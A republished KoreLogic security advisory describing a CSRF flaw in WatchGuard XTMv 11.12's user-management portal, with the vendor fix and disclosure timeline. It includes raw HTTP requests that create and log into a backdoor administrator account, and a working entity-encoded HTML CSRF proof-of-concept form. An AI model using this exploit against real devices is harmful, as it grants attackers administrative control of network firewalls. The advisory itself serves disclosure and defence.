首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery
来源:https://www.korelogic.com 作者:KoreLogic 发布时间:2017-03-13  
<!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
 
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt
 
 
1. Vulnerability Details
 
     Affected Vendor: WatchGuard
     Affected Product: XTMv
     Affected Version: v11.12 Build 516911
     Platform: Embedded Linux
     CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
     Impact: Privileged Access
     Attack vector: HTTP
 
2. Vulnerability Description
 
     Lack of CSRF protection in the Add User functionality of the
     XTMv management portal can be leveraged to create arbitrary
     administrator-level accounts.
 
3. Technical Description
 
     As observed below, no CSRF token is in use when adding a new
     user to the management portal.
 
     POST /put_data/ HTTP/1.1
     Host: 1.3.3.7:8080
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Content-Type: application/json
     X-Requested-With: XMLHttpRequest
     Content-Length: 365
     Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
     DNT: 1
     Connection: close
 
 
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}
 
     The HTTP response indicates that the changes were successful.
 
     HTTP/1.1 200 OK
     X-Frame-Options: SAMEORIGIN
     Content-Length: 68
     Expires: Sun, 28 Jan 2007 00:00:00 GMT
     Vary: Accept-Encoding
     Server: CherryPy/3.6.0
     Pragma: no-cache
     Cache-Control: no-cache, must-revalidate
     Date: Sat, 10 Dec 2016 18:08:22 GMT
     Content-Type: application/json
     Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
     Connection: close
 
     {"status": true, "message": ["The changes were saved successfully"]}
 
     Now, the newly created backdoor account can be accessed.
 
     POST /agent/login HTTP/1.1
     Host: 1.3.3.7:8080
     Accept: application/xml, text/xml, */*; q=0.01
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Content-Type: text/xml
     X-Requested-With: XMLHttpRequest
     Content-Length: 414
     Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
     DNT: 1
     Connection: close
 
 
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>
 
     The response below shows the application issuing an authenticated
     session cookie.
 
     HTTP/1.1 200 OK
     X-Frame-Options: SAMEORIGIN
     Content-type: text/xml
     Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
     Connection: close
     Date: Sat, 10 Dec 2016 19:55:26 GMT
     Server: none
     Content-Length: 751
 
     <?xml version="1.0"?>
     <methodResponse>
       <params>
         <param>
           <value>
             <struct>
               <member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
               <member><name>response</name><value></value></member>
               <member>
                 <name>readwrite</name>
                 <value><struct>
                   <member><name>privilege</name><value>2</value></member>
                   <member><name>peer_sid</name><value>0</value></member>
                   <member><name>peer_name</name><value>error</value></member>
                   <member><name>peer_ip</name><value>0.0.0.0</value></member>
                 </struct></value>
               </member>
             </struct>
           </value>
         </param>
       </params>
     </methodResponse>
 
4. Mitigation and Remediation Recommendation
 
     The vendor has remediated this vulnerability in WatchGuard
     XTMv v11.12.1. Release notes and upgrade instructions are
     available at:
 
     https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html
 
5. Credit
 
     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc. and Joshua Hardin.
 
6. Disclosure Timeline
 
     2017.01.13 - KoreLogic sends vulnerability report and PoC to
                  WatchGuard.
     2017.01.13 - WatchGuard acknowledges receipt of report.
     2017.01.23 - WatchGuard informs KoreLogic that the
                  vulnerability will be addressed in the forthcoming
                  v11.12.1 firmware, scheduled for general
                  availability on or around 2017.02.21.
     2017.02.22 - WatchGuard releases v11.12.1.
     2017.03.10 - KoreLogic public disclosure.
 
7. Proof of Concept
-->
 
     <html>
       <body>
         <form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
           <input type="hidden"
name="&#x7b;"&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;"&#x3a;"&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;"&#x2c;"&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;"&#x3a;"&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x70;&#x61;&#x67;&#x65;&#x2e;&#x73;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x2e;&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;"&#x2c;"&#x75;&#x73;&#x65;&#x72;&#x73;"&#x3a;&#x5b;&#x5d;&#x2c;"&#x61;&#x64;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x7b;"&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;"&#x3a;"&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;"&#x2c;"&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;"&#x3a;"&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x76;&#x6f;&#x2e;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;"&#x2c;"&#x6e;&#x61;&#x6d;&#x65;"&#x3a;"&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;"&#x2c;"&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;"&#x3a;"&#x46;&#x69;&#x72;&#x65;&#x62;&#x6f;&#x78;&#x2d;&#x44;&#x42;"&#x2c;"&#x72;&#x6f;&#x6c;&#x65;"&#x3a;"&#x44;&#x65;&#x76;&#x69;&#x63;&#x65;&#x20;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x69;&#x73;&#x74;&#x72;&#x61;&#x74;&#x6f;&#x72;"&#x2c;"&#x68;&#x61;&#x73;&#x68;"&#x3a;"&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;"&#x2c;"&#x65;&#x6e;&#x61;&#x62;&#x6c;&#x65;&#x64;"&#x3a;&#x31;&#x2c;"&#x72;&#x6f;&#x77;&#x69;&#x6e;&#x64;&#x65;&#x78;"&#x3a;&#x2d;&#x31;&#x7d;&#x5d;&#x2c;"&#x75;&#x70;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x5d;&#x2c;"&#x64;&#x65;&#x6c;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x5d;&#x7d;"
value="" />
           <input type="submit" value="Trigger" />
         </form>
       </body>
     </html>
 
<!--
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
 
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
 
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wireless IP Camera (P2P) WIFIC
·e107 <= 2.1.4 - 'keyword' Blin
·FTP Voyager Scheduler 16.2.0 -
·MobaXterm Personal Edition 9.4
·ASUSWRT RT-AC53 (3.0.0.4.380.6
·Apache Struts 2 2.3.x / 2.5.x
·Apache Struts 2.3.5 < 2.3.31 /
·Netgear R7000 / R6400 cgi-bin
·Livebox 3 Sagemcom SG30_sip-fr
·Cerberus FTP Server 8.0.10.1 -
·Drupal 7.x Module Services - R
·MikroTik Router - ARP Table Ov
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved